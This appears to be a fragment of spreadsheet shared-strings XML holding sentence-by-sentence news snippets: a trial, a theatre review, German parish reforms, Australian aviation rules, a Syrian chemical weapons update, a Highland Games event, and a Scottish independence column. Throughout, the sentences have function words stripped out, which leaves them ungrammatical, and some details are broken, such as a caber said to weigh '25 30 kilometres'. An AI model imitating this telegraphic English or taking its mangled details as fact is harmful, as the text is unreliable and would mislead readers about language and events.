  </si>
  <si>
    <t xml:space="preserve"> The intercepted conversations characterised high level aggression </t>
  </si>
  <si>
    <t xml:space="preserve"> In subsequent hearings , victims confirmed ordeal </t>
  </si>
  <si>
    <t xml:space="preserve"> A witness , whereby one woman suffered blue bruises body , yet make statement </t>
  </si>
  <si>
    <t xml:space="preserve"> This case &amp;quot; completely broken personality &amp;quot; , views violence exploitation field normal </t>
  </si>
  <si>
    <t xml:space="preserve"> Yesterday accused expressed regret behaviour </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I removed circles hope lead completely normal life following imprisonment , &amp;quot; stated </t>
  </si>
  <si>
    <t xml:space="preserve"> For 30 years , Josef Winkler writing heart , telling hardships childhood youth </t>
  </si>
  <si>
    <t xml:space="preserve"> The catastrophes Catholic village upbringing - speechlessness , tendency towards brute force dulled sexuality , confinement lack joy - described many times Kaernten-born poet </t>
  </si>
  <si>
    <t xml:space="preserve"> The Büchner prizewinner known primarily writer prose , theatre texts something rarity </t>
  </si>
  <si>
    <t xml:space="preserve"> In collage prose texts For performance piece , &amp;quot; Wetterleuchten auf der Zungenspitze &amp;quot; (Summer lightning tip tongue), seen Garage X Petersplatz , Gerhard Fresacher , creates collage prose texts </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> On predominantly empty stage - one important requirement: crumpled sofa , cast members allude copulating masturbating - eight-person ensemble work way text material </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Director Fresacher seems little trust text </t>
  </si>
  <si>
    <t xml:space="preserve"> In particular , actresses play major role sometimes rather dubious staging </t>
  </si>
  <si>
    <t xml:space="preserve"> They manhandled , heads held water , tacked wall evening gowns </t>
  </si>
  <si>
    <t xml:space="preserve"> Wrapped cellophane girdles , stumble dangerously high heels across set , either delivering monologues top voices lying completely silent stage </t>
  </si>
  <si>
    <t xml:space="preserve"> However , source text makes barely reference intense delivery </t>
  </si>
  <si>
    <t xml:space="preserve"> The best moments evening singing starts - tracks range Deep Purple traditional folk songs </t>
  </si>
  <si>
    <t xml:space="preserve"> Only towards end highly charged performance start wind , see flashes Winkler &amp;apos;s somewhat absurd sense humour </t>
  </si>
  <si>
    <t xml:space="preserve"> Music makes entertaining afternoon It 15 years ago Kaul family first invited Dietingen senior citizens coffee cake , followed snack </t>
  </si>
  <si>
    <t xml:space="preserve"> Previously , elderly citizens hosted service station canteen </t>
  </si>
  <si>
    <t xml:space="preserve"> The coffee afternoon held St</t>
  </si>
  <si>
    <t xml:space="preserve"> Josef nursing home </t>
  </si>
  <si>
    <t xml:space="preserve"> The residents home delighted delicious cakes tarts </t>
  </si>
  <si>
    <t xml:space="preserve"> Later , sausage salad provided </t>
  </si>
  <si>
    <t xml:space="preserve"> Silvia Kimmich-Bantle father Karl Kimmich entertained attendance popular tunes </t>
  </si>
  <si>
    <t xml:space="preserve"> Haslach: Scepticism visibly gives way confidence The 2015 Parish Council elections bring fundamental change , example Haslach Pastoral Care Unit (Seelsorgeeinheit Haslach , SE)</t>
  </si>
  <si>
    <t xml:space="preserve"> There one joint Parish Council six parishes </t>
  </si>
  <si>
    <t xml:space="preserve"> In joint meeting Saturday , committees Haslach , Hofstetten , Mühlenbach , Fischerbach , Steinach Welschensteinach prepared changes </t>
  </si>
  <si>
    <t xml:space="preserve"> This changes made fundamental decisions diocese Parish Councils implement satisfactory manner possible </t>
  </si>
  <si>
    <t xml:space="preserve"> During course day one thing became particularly clear: scepticism towards new system reluctantly yet visibly giving way confidence </t>
  </si>
  <si>
    <t xml:space="preserve"> The extremely constructive discussions six committees full-time members pastoral care team addressed topics ranging perceptions expectations regarding 2015 reforms , concrete proposals regarding future composition size Parish Council </t>
  </si>
  <si>
    <t xml:space="preserve"> Regional Dean Georg Schmitt explained newly drawn-up guidelines pastoral care units arch-diocese Freiburg help presentation </t>
  </si>
  <si>
    <t xml:space="preserve"> According guidelines , SE Haslach , church community , corporation public law , shall assume rights obligations six individual church communities </t>
  </si>
  <si>
    <t xml:space="preserve"> There one joint Parish Council Foundation Council , rector represented virtue office </t>
  </si>
  <si>
    <t xml:space="preserve"> From parish , least two elected members represented , so-called church community teams set on-site six parishes </t>
  </si>
  <si>
    <t xml:space="preserve"> In future task promote church life local basis </t>
  </si>
  <si>
    <t xml:space="preserve"> Regarding issue finances individual parishes , need extensive discussion became evident </t>
  </si>
  <si>
    <t xml:space="preserve"> The reforms plan accumulated assets parishes retained specified purpose </t>
  </si>
  <si>
    <t xml:space="preserve"> Accounts payable , hand , passed &amp;quot; church community &amp;quot; whole </t>
  </si>
  <si>
    <t xml:space="preserve"> In particular , planned major investments , debts thus affect parishes , cause great concern </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In past , investments made projects could managed individual parishes , &amp;quot; said Haslach &amp;apos;s Parish Council Chairman Bruno Prinzbach </t>
  </si>
  <si>
    <t xml:space="preserve"> Barbar Ritter , Chair Committee Schutterwald-Neuried pastoral care unit , practical experience joint committee five parishes </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2006 set task , &amp;quot; Become one , remain five &amp;quot; came realise task really simple </t>
  </si>
  <si>
    <t xml:space="preserve"> The Committees Haslach pastoral care unit set answer questions regarding future composition size joint Parish Council , practical work church community teams </t>
  </si>
  <si>
    <t xml:space="preserve"> The specific details confirmed subsequent meetings decided additional joint meeting six committees coming spring </t>
  </si>
  <si>
    <t xml:space="preserve"> At end , Parish Counsellor Michael Schöner Steinach presented new logo pastoral care unit , agreed clear majority </t>
  </si>
  <si>
    <t xml:space="preserve"> Aircraft electronic device rules stay force Australia Australian airline passengers need continue turning tablets smart phones take-off landing despite moves US loosen regulations covering devices </t>
  </si>
  <si>
    <t xml:space="preserve"> The US Federal Aviation Administration left way open American carriers change procedures passengers able read e-books , watch videos play games devices critical phases flight provided remain &amp;quot; airplane &amp;quot; mode </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers already bulk flight many people find annoying unable access e-books take-offs landings </t>
  </si>
  <si>
    <t xml:space="preserve"> Australian carriers looking decision , requires US carriers undertake massive amount work meet requirements , indicated immediate plans change procedures </t>
  </si>
  <si>
    <t xml:space="preserve"> The Civil Aviation Safety Authority also said looking announcement emphasised restrictions use electronic devices critical phases flight still place Australia </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; CASA currently specific regulations governing use electronic devices aircraft , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> The issue covered regulations require aircraft operators ensure safety maintained times passengers comply safety instructions given crew members </t>
  </si>
  <si>
    <t xml:space="preserve"> Virgin , already talking CASA extending use in-flight wi-fi entertainment system , amenable change said would take lead regulator </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We would welcome review CASA allowing use electronic devices really think improve customer experience (wireless in-flight entertainment) planes , &amp;quot; spokesman said </t>
  </si>
  <si>
    <t xml:space="preserve"> Qantas said would stick current rules </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Our current policy electronic devices cannot used take-off landing immediate plans change , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> The FAA ruling applies American airlines </t>
  </si>
  <si>
    <t xml:space="preserve"> However , always interested regulatory developments could benefit passengers certainly taking close look FAA &amp;apos;s decision reasons behind </t>
  </si>
  <si>
    <t xml:space="preserve"> For US carriers , impact ruling vary airline airline depend age fleet </t>
  </si>
  <si>
    <t xml:space="preserve"> Carriers need prove planes tolerate radio interference mobile devices well revise manuals , training materials , carry-on baggage programs passenger briefings </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Once airline verifies tolerance fleet , allow passengers use handheld , lightweight electronic devices tablets , e-readers , smartphones-at altitudes , &amp;quot; FAA said </t>
  </si>
  <si>
    <t xml:space="preserve"> In rare instances low visibility , crew instruct passengers turn devices landing </t>
  </si>
  <si>
    <t xml:space="preserve"> The group also recommended heavier devices safely stowed seats overhead bins take-off landing </t>
  </si>
  <si>
    <t xml:space="preserve"> Driver speeding 130mph hot drink legs fined £ 1,000 A motorist fined £ 1,000 driving 130mph (210km / h) hot drink balanced legs </t>
  </si>
  <si>
    <t xml:space="preserve"> Andrew Howie , 35 , Tiptree , Essex , spotted driving Mercedes Benz A120 Braintree 27 May </t>
  </si>
  <si>
    <t xml:space="preserve"> When police stopped discovered takeaway drink legs </t>
  </si>
  <si>
    <t xml:space="preserve"> At Colchester Magistrates &amp;apos; Court Howie admitted charge driving without due care attention </t>
  </si>
  <si>
    <t xml:space="preserve"> Seven points added licence resulted receiving six-month driving ban </t>
  </si>
  <si>
    <t xml:space="preserve"> Howie also ordered pay costs £ 90 victim surcharge £ 100 </t>
  </si>
  <si>
    <t xml:space="preserve"> As crowds horse-showing experts gathered Cardiff battle Horse Year , knew competition would tough </t>
  </si>
  <si>
    <t xml:space="preserve"> But nobody quite ready three-year-old Fenton Kirkland </t>
  </si>
  <si>
    <t xml:space="preserve"> Not yet school months taking first steps , toddler pet Shetland pony Toffee trotted three rounds ease take top prize - leaving 30 adult opponents trailing behind </t>
  </si>
  <si>
    <t xml:space="preserve"> The inseparable pair - height - commended appearance , behaviour style annual contest run Sunnybank Equestrian Centre , Rudry near Cardiff </t>
  </si>
  <si>
    <t xml:space="preserve"> Taking stage men women smart bowler hats , tipped flat cap jaunty angle paraded two-year-old Toffee around ring </t>
  </si>
  <si>
    <t xml:space="preserve"> Fenton lauded judges natural handling skills well beyond years </t>
  </si>
  <si>
    <t xml:space="preserve"> And Toffee received top marks appearance personality </t>
  </si>
  <si>
    <t xml:space="preserve"> Fenton given Toffee third birthday present last March practised Shetland pony every day since </t>
  </si>
  <si>
    <t xml:space="preserve"> His mother Donna , 30 , said: &amp;quot; Fenton Toffee great double act </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They comers two walked gold cup rosette </t>
  </si>
  <si>
    <t xml:space="preserve"> It second time competed Toffee ecstatic </t>
  </si>
  <si>
    <t xml:space="preserve"> Complete strangers arena thought phenomenal wanted photos taken </t>
  </si>
  <si>
    <t xml:space="preserve"> The youngster , village Nantyglo , near Ebbw Vale , South Wales , following footsteps aunt Sharon Howells , showing horses 10 years </t>
  </si>
  <si>
    <t xml:space="preserve"> Mrs Howells said: &amp;quot; The whole place electric everybody cheering clapping </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He running sand full length arena even though looked tiny marvellous job </t>
  </si>
  <si>
    <t xml:space="preserve"> Fenton animal mad - loves horses , tractors farms got two chickens looks </t>
  </si>
  <si>
    <t xml:space="preserve"> The way started &amp;apos;ll Horse Year show long - I &amp;apos;m sure &amp;apos;ll well </t>
  </si>
  <si>
    <t xml:space="preserve"> A spokesman annual horse show said: &amp;quot; Fenton three knows handle pony </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They great team together </t>
  </si>
  <si>
    <t xml:space="preserve"> The judges marked Fenton Toffee well turned way presented show ring </t>
  </si>
  <si>
    <t xml:space="preserve"> They look good teamwork pony handler - Fenton Toffee best ring </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;m sure Fenton helped cute clothes , really looked part </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Also Thursday , Syrian activist group said 120,000 people killed since start country &amp;apos;s civil war nearly three years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> The announcement Organization Prohibition Chemical Weapons came one day ahead Nov </t>
  </si>
  <si>
    <t xml:space="preserve"> 1 deadline set The Hague-based organization Damascus destroy &amp;quot; render inoperable &amp;quot; chemical weapon production facilities machinery mixing chemicals poison gas filling munitions </t>
  </si>
  <si>
    <t xml:space="preserve"> The completion essentially initial stage destruction significant milestone ambitious timeline aims destroy Damascus &amp;apos; chemical weapons mid-2014 </t>
  </si>
  <si>
    <t xml:space="preserve"> Destruction equipment means Syria longer produce new chemical weapons </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Damascus still start destroying existing weapons stockpiles </t>
  </si>
  <si>
    <t xml:space="preserve"> The country believed around 1,000 metric tons chemicals weapons including mustard gas nerve agent sarin </t>
  </si>
  <si>
    <t xml:space="preserve"> The announcement came fighting raged Thursday town Safira , experts say home chemical weapons production facility well storage sites , reported Britain-based Syrian Observatory Human Rights </t>
  </si>
  <si>
    <t xml:space="preserve"> The activist group , tracking death toll network activists Syria , said Thursday 120,296 people died </t>
  </si>
  <si>
    <t xml:space="preserve"> Of , said 61,067 civilians , including 6,365 children </t>
  </si>
  <si>
    <t xml:space="preserve"> On government side , said 29,954 members President Bashar Assad &amp;apos;s armed forces , 18,678 pro-government fighters 187 Lebanese Hezbollah militants </t>
  </si>
  <si>
    <t xml:space="preserve"> Also among dead said 2,202 army defectors 5,375 opposition fighters , many foreigners </t>
  </si>
  <si>
    <t xml:space="preserve"> On July 25 , U</t>
  </si>
  <si>
    <t>N</t>
  </si>
  <si>
    <t xml:space="preserve"> estimated 100,000 died conflict since March 2011 </t>
  </si>
  <si>
    <t xml:space="preserve"> It updated figure since </t>
  </si>
  <si>
    <t xml:space="preserve"> The conflict forced 2 million people flee country </t>
  </si>
  <si>
    <t xml:space="preserve"> Assad &amp;apos;s troops battling rebels , many linked al-Qaida groups , Safira weeks </t>
  </si>
  <si>
    <t xml:space="preserve"> The Observatory said casualties sides Thursday specifics </t>
  </si>
  <si>
    <t xml:space="preserve"> The fighting underscored dangers chemical weapons &amp;apos; inspectors face race tight deadlines mission rid Syria toxic arsenal midst ongoing civil war </t>
  </si>
  <si>
    <t xml:space="preserve"> A statement OPCW , works closely United Nations , said team &amp;quot; satisfied verified - seen destroyed - Syria &amp;apos;s declared critical production mixing / filling equipment </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It added , &amp;quot; inspection activities currently planned </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Earlier week , inspectors said completed first round verification work , visiting 21 23 sites declared Damascus </t>
  </si>
  <si>
    <t xml:space="preserve"> They unable visit two sites security concerns , inspectors said </t>
  </si>
  <si>
    <t xml:space="preserve"> On Thursday , OPCW said two locations , according Syria , &amp;quot; abandoned </t>
  </si>
  <si>
    <t xml:space="preserve"> chemical weapons program items contained moved declared sites , inspected </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It immediately clear facility Safira one two sites OPCW inspectors able visit </t>
  </si>
  <si>
    <t xml:space="preserve"> Syria submitted plan total destruction chemical weapons approved next month OPCW &amp;apos;s executive committee </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I salute fortitude courage &amp;apos;ve demonstrated fulfilling challenging mission ever undertaken organization , &amp;quot; watchdog &amp;apos;s director-general , Ahmet Uzumcu , said comments released OPCW </t>
  </si>
  <si>
    <t xml:space="preserve"> Now third year , civil war pits primarily Sunni Muslim rebels Assad &amp;apos;s government security forces , stacked members Alawite sect , offshoot Shiite Islam </t>
  </si>
  <si>
    <t xml:space="preserve"> In developments , Observatory &amp;apos;s chief Rami Abdurrahman said strong explosion Wednesday inside air defense facility Syria &amp;apos;s coastal province Latakia </t>
  </si>
  <si>
    <t xml:space="preserve"> The cause blast known , said </t>
  </si>
  <si>
    <t xml:space="preserve"> Highland Games Kaltenhof Alongside brake van pulling tractors , also second contest agricultural autumn festival Kaltenhof 6 8 September </t>
  </si>
  <si>
    <t xml:space="preserve"> On Saturday 7 September , Highland Games start 1: 30 p</t>
  </si>
  <si>
    <t xml:space="preserve"> While course Scottish tradition , given touch Swabian colour Kaltenhof event grounds </t>
  </si>
  <si>
    <t xml:space="preserve"> Teams individual competitors pitted one another disciplines tossing caber , horseshoe tossing bucket carrying </t>
  </si>
  <si>
    <t xml:space="preserve"> The caber four half metres long weighs 25 30 kilometres </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It &amp;apos;t distance , &amp;quot; explains organiser Peter Saile </t>
  </si>
  <si>
    <t xml:space="preserve"> The log must thrown vertically , somersault finish lying straight </t>
  </si>
  <si>
    <t xml:space="preserve"> This scores maximum points </t>
  </si>
  <si>
    <t xml:space="preserve"> In tossing horseshoe , comes accuracy </t>
  </si>
  <si>
    <t xml:space="preserve"> Horseshoes thrown onto peg distance eight metres </t>
  </si>
  <si>
    <t xml:space="preserve"> Participants must prove skill strength carrying bucket water 50 metres </t>
  </si>
  <si>
    <t xml:space="preserve"> Time recorded water quantity measured vat end </t>
  </si>
  <si>
    <t xml:space="preserve"> Two members &amp;quot; clan &amp;quot; team take part individual competition </t>
  </si>
  <si>
    <t xml:space="preserve"> The winners team individual contests receive prizes </t>
  </si>
  <si>
    <t xml:space="preserve"> Teams practice 10: 00 a</t>
  </si>
  <si>
    <t xml:space="preserve"> Suitable clothing desirable - example competitors wear kilts </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Swabian traditional clothing also permitted </t>
  </si>
  <si>
    <t xml:space="preserve"> The judging panel also award bonus points &amp;quot; outfits &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Registration open hours prior beginning competition </t>
  </si>
  <si>
    <t xml:space="preserve"> With Scottish-Swabian Highland Games tractor pulling contest , begin half hour beforehand , promises great deal action event grounds Saturday </t>
  </si>
  <si>
    <t xml:space="preserve"> In evening , fans brass band music treat </t>
  </si>
  <si>
    <t xml:space="preserve"> At 19: 00 , &amp;quot; biraböhmische &amp;quot; (a play words alluding regions pear trees , Bohemia , perhaps love beer well !) wind music group Schömberg , provide great evening entertainment </t>
  </si>
  <si>
    <t xml:space="preserve"> The band plays lively polkas marches </t>
  </si>
  <si>
    <t xml:space="preserve"> However , repertoire also includes emotive waltzes full big band sound </t>
  </si>
  <si>
    <t xml:space="preserve"> Heinz Koch Weilen unter den Rinnen also , better known &amp;apos; singing inn keeper black sausage baron &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> In past , appeared Christmas market Dornhan Narrenzunft (Fool &amp;apos;s Guild event)</t>
  </si>
  <si>
    <t xml:space="preserve"> On Sunday , Leinstetten Music Society entertain audiences morning session , Böffingen Farmer &amp;apos;s Band guests 2: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> , &amp;quot; Oldies &amp;quot; bring celebrations close </t>
  </si>
  <si>
    <t xml:space="preserve"> The celebrations get way Friday , &amp;quot; Stoppelacker &amp;quot; (Stubble Field) party featuring DJ Ralf </t>
  </si>
  <si>
    <t xml:space="preserve"> Other items itinerary Saturday Sunday include vintage car tractor meet exhibitions companies topic agriculture forestry </t>
  </si>
  <si>
    <t xml:space="preserve"> Further attractions Sunday corn maze , craft market sheep shearing </t>
  </si>
  <si>
    <t xml:space="preserve"> Specially children , petting zoo , &amp;quot; straw bouncy castle &amp;quot; , tractor driving (under supervision) tractor surfing </t>
  </si>
  <si>
    <t xml:space="preserve"> The event organised community hall association , ski club &amp;quot; Zündkapsele &amp;quot; (blasting caps) tractor enthusiasts </t>
  </si>
  <si>
    <t xml:space="preserve"> George Kerevan: Europe break-up gives Scots choice Another day , another independence scare story </t>
  </si>
  <si>
    <t xml:space="preserve"> This time warned independent Scotland would required join Europe-wide free-travel zone condition EU membership </t>
  </si>
  <si>
    <t xml:space="preserve"> Cue stories passport controls Berwick barbed wire border along Hadrian &amp;apos;s Wall </t>
  </si>
  <si>
    <t xml:space="preserve"> True , Strathclyde paper pointed possible economic benefits freer movement rest Europe , though - predictably - figure headlines </t>
  </si>
  <si>
    <t xml:space="preserve"> Nor anyone point EU member states spend much time bending formal rules suits </t>
  </si>
  <si>
    <t xml:space="preserve"> Since Scotland &amp;apos;t Schengen area , continued non-compliance would cheap concession Brussels offer return whatever really wanted Scots </t>
  </si>
  <si>
    <t xml:space="preserve"> So , non-story , </t>
  </si>
  <si>
    <t xml:space="preserve"> And one long tooth become fossilised: I first heard &amp;quot; independence means passport controls &amp;quot; canard least 40 years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Yet interesting point lost retelling whiskery old tale </t>
  </si>
  <si>
    <t xml:space="preserve"> Why independent Scotland expected Europe &amp;apos;s bidding , anyway ? Why trade London &amp;apos;s yoke Brussels , especially ? Here real European news: great , post-war plan unite Europe finally stalled </t>
  </si>
  <si>
    <t xml:space="preserve"> With euro crisis , Project Europe officially dead </t>
  </si>
  <si>
    <t xml:space="preserve"> Across EU , parties dedicated opposing EU , scrapping euro common currency , gaining ground </t>
  </si>
  <si>
    <t xml:space="preserve"> Even Germany , Eurosceptic Alternative Germany Party - founded year - came nowhere grab nearly five million votes September &amp;apos;s federal elections , thus effectively knocking Free Democrats (equivalent Lib Dems) Bundestag </t>
  </si>
  <si>
    <t xml:space="preserve"> There always domestic opposition plan create federal Europe </t>
  </si>
  <si>
    <t xml:space="preserve"> However , current economic crisis proved watershed </t>
  </si>
  <si>
    <t xml:space="preserve"> The austerity imposed Berlin European Central Bank , coupled straitjacket imposed national economies adherence common currency , led many people think Project Europe gone far </t>
  </si>
  <si>
    <t xml:space="preserve"> The crisis euro little national governments running excessive budget deficits - true Greece </t>
  </si>
  <si>
    <t xml:space="preserve"> Rather , euro system locked members exchange rates favourable German exporters - something German politicians want keep </t>
  </si>
  <si>
    <t xml:space="preserve"> Without possibility domestic currency devaluation , southern Europe finds built-in productivity disadvantage vis-à-vis Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> The recourse slash wages public spending - spurred Berlin </t>
  </si>
  <si>
    <t xml:space="preserve"> Beyond current budget currency problems lies deeper European productivity malaise </t>
  </si>
  <si>
    <t xml:space="preserve"> As result &amp;quot; green &amp;quot; energy policies imposed Brussels - code subsidising French German energy firms consumer &amp;apos;s expense - European industry pays twice much electricity , four times much gas , United States </t>
  </si>
  <si>
    <t xml:space="preserve"> That crippling cost disadvantage , &amp;apos;ve already seen Grangemouth </t>
  </si>
  <si>
    <t xml:space="preserve"> All wage freezes world &amp;apos;t stop European petrochemicals industry hammered cheap US shale gas </t>
  </si>
  <si>
    <t xml:space="preserve"> As result , revolt brewing , especially France , EU &amp;apos;s main cheerleader </t>
  </si>
  <si>
    <t xml:space="preserve"> After war , French political elite saw EU vehicle keep Germany check , give Paris equal billing world Washington </t>
  </si>
  <si>
    <t xml:space="preserve"> But Berlin longer needs Paris passport political legitimacy imposed economic policy Europe , leaving battered French economy struggling </t>
  </si>
  <si>
    <t xml:space="preserve"> Result: Marine Le Pen &amp;apos;s right-wing , anti-EU National Front crucial by-election , knocking ruling Socialists third place </t>
  </si>
  <si>
    <t xml:space="preserve"> The Front popular party France 24 per cent vote - timely warning British Labour &amp;apos;t assume split right automatically favour left </t>
  </si>
  <si>
    <t xml:space="preserve"> What Le Pen newfound popularity among French white , working class ? She wants use next year &amp;apos;s EU elections create anti-EU , anti-common currency bloc across European Parliament </t>
  </si>
  <si>
    <t xml:space="preserve"> If , possible , anti-EU parties well elections , bloc could dominate European Parliament first time </t>
  </si>
  <si>
    <t xml:space="preserve"> Here &amp;apos;s point: sometime soon growing anti-EU anti-common currency feeling Europe coalesce kill euro </t>
  </si>
  <si>
    <t xml:space="preserve"> The EU &amp;apos;t disappear , revert something like loose &amp;quot; Europe (Sovereign) Nations &amp;quot; favoured General de Gaulle </t>
  </si>
  <si>
    <t xml:space="preserve"> Germany satellite economies might keep euro France southern Europe revive currencies </t>
  </si>
  <si>
    <t xml:space="preserve"> I expect UK distance project , hoping cosy US </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Washington &amp;apos;s growing interest Pacific suggests Britain left Atlantic cold </t>
  </si>
  <si>
    <t xml:space="preserve"> Where leave Scotland ? We choose region (essentially) Little England </t>
  </si>
  <si>
    <t xml:space="preserve"> Or defend economic interests - includes telling Berlin Brussels get </t>
  </si>
  <si>
    <t xml:space="preserve"> I suspect Scotland could well inside looser European arrangement provided kept currency </t>
  </si>
  <si>
    <t xml:space="preserve"> Co-operation like-minded countries easier non-federal Europe Nations </t>
  </si>
  <si>
    <t xml:space="preserve"> Otherwise consider emulating Norway retaining economic independence </t>
  </si>
  <si>
    <t xml:space="preserve"> The SNP government Scotland - remarkably-- successful anti-austerity political movement Europe , spectacular majority 2011 basis opposing cuts proposed (and implemented) Labour &amp;apos;s chancellor Alistair Darling subsequent Tory-Lib Dem coalition </t>
  </si>
  <si>
    <t xml:space="preserve"> It would ridiculous Scotland vote independence accept austerity imposed Berlin Brussels </t>
  </si>
  <si>
    <t xml:space="preserve"> Children taught myths legends &amp;quot; models way life &amp;quot; , author says </t>
  </si>
  <si>
    <t xml:space="preserve"> Tales Thor could show &amp;quot; brute strength match subtle trickery , &amp;quot; Arthurian legends reveal importance dream </t>
  </si>
  <si>
    <t xml:space="preserve"> Saying many myths would &amp;quot; far wild , far scandalous cases far filthy taught schools , &amp;quot; Crossley-Holland advocated &amp;quot; careful selection &amp;quot; age-appropriate works </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I find wonderful America , myth folklore already part education , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> I advocating plan twenty years </t>
  </si>
  <si>
    <t xml:space="preserve"> He added authors teachers &amp;quot; overtly didactic &amp;quot; &amp;quot; total switch-off &amp;quot; children , messages &amp;quot; subliminated &amp;quot; enjoyable stories </t>
  </si>
  <si>
    <t xml:space="preserve"> Crossley-Holland , translated Beowulf Anglo-Saxon well writing Penguin Book Norse Myths British Folk Tales , said: &amp;quot; You may well intentions better keep well sight </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Perhaps big difference adult author writing adult adult author writing child necessity sense hope </t>
  </si>
  <si>
    <t xml:space="preserve"> Not everything simplified come happy ending , innate sense good evil </t>
  </si>
  <si>
    <t xml:space="preserve"> And must subliminated; revealed story rather stated </t>
  </si>
  <si>
    <t xml:space="preserve"> The old basis showing telling </t>
  </si>
  <si>
    <t xml:space="preserve"> Salem: Johanna Rahner Ecumenical Discussion Forum At next Ecumenical Discussion Forum Monday 21 October , Neues Museum des Schlosses (New Castle Museum), focus topic &amp;quot; To hell Hell - Theological reflections approach notion end times &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The speaker Johanna Rahner </t>
  </si>
  <si>
    <t xml:space="preserve"> The Ecumenical Discussion Forum initiative Catholic Protestant churches Salem , Salem Castle Lake Constance District Cultural Office </t>
  </si>
  <si>
    <t xml:space="preserve"> At forum , Johanna Rahner wants address question people today view &amp;quot; end times &amp;quot; death </t>
  </si>
  <si>
    <t xml:space="preserve"> While people past centuries overly conscious , focusing pictures heaven hell &amp;quot; defined ideas &amp;quot; , contemporary prophetic teaching hope consummation characterised certain bashfulness , even speechlessness </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The greater hope well truly cast Christians religious critics , &amp;quot; said speaker </t>
  </si>
  <si>
    <t xml:space="preserve"> They &amp;quot; provided us many question marks , seem lost exclamation marks &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Johanna Rahner continued: &amp;quot; However , crucial challenge remains fear death &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Associated matter longing , &amp;quot; dreams everything good end &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Johanna Rahner , born 1962 Baden-Baden , studied Catholic theology biology 1982 1989 Albert Ludwig &amp;apos;s University Freiburg </t>
  </si>
  <si>
    <t xml:space="preserve"> In 1997 graduated doctor theology , also Freiburg </t>
  </si>
  <si>
    <t xml:space="preserve"> A post-doctoral lecturing qualification fundamental theology ecumenical theology followed 2003 Westfalian Wilhelm &amp;apos;s University </t>
  </si>
  <si>
    <t xml:space="preserve"> Since 2010 , Johanna Rahner occupied Chair Systematic Theology Institute Catholic Theology University Kassel </t>
  </si>
  <si>
    <t xml:space="preserve"> Germany &amp;apos;s largest national church launched campaign advertising minister &amp;apos;s position </t>
  </si>
  <si>
    <t xml:space="preserve"> This comes time possible shortage ministers: The Protestant Lutheran Regional Church Hanover calculates , things stand , current number around 1,800 pastors halved 2030 </t>
  </si>
  <si>
    <t xml:space="preserve"> For young people today , career attractive offers good future prospects , said Pastor Mathis Burfien (43) conversation Protestant Press Service </t>
  </si>
  <si>
    <t xml:space="preserve"> It attractive able determine daily working routine </t>
  </si>
  <si>
    <t xml:space="preserve"> With Burfien , regional church first time commissioned minister work full time , endeavouring inspire young people study theology </t>
  </si>
  <si>
    <t xml:space="preserve"> At present , fewer fewer young people deciding study theology Abitur examinations (equivalent A levels)</t>
  </si>
  <si>
    <t xml:space="preserve"> Burfien puts process secularisation: &amp;quot; God &amp;apos;s voice quiet , world loud &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The job characterised great freedom variety </t>
  </si>
  <si>
    <t xml:space="preserve"> I master schedule therefore turn focus important </t>
  </si>
  <si>
    <t xml:space="preserve"> As pastoral workers , ministers close people </t>
  </si>
  <si>
    <t xml:space="preserve"> They earn much teachers make good living </t>
  </si>
  <si>
    <t xml:space="preserve"> Of course wages higher within private sector , hand , theologians secure employer </t>
  </si>
  <si>
    <t xml:space="preserve"> This would suit young people today , career , meaningful job well </t>
  </si>
  <si>
    <t xml:space="preserve"> According information Regional Church , covers three quarters Lower Saxony , around 60 pastors retire every year </t>
  </si>
  <si>
    <t xml:space="preserve"> At time , around 40 theology graduates begin vicars </t>
  </si>
  <si>
    <t xml:space="preserve"> In future may difficult fill positions sparsely populated outlying areas Harz , Emsland Wendland </t>
  </si>
  <si>
    <t xml:space="preserve"> Among initiatives , Burfien wants organise study days young people , inviting famous faces studied theology </t>
  </si>
  <si>
    <t xml:space="preserve"> Theology courses offer broad training </t>
  </si>
  <si>
    <t xml:space="preserve"> You even become Federal President theology degree </t>
  </si>
  <si>
    <t xml:space="preserve"> A kindergarten found private buyer &amp;quot; The building good hands , &amp;quot; said Winterlingen &amp;apos;s Mayor Michael Maier </t>
  </si>
  <si>
    <t xml:space="preserve"> The local authorities sold former Kindergarten Gartenstraße private buyer </t>
  </si>
  <si>
    <t xml:space="preserve"> The Town Council consented sale recent meeting , part meeting open public </t>
  </si>
  <si>
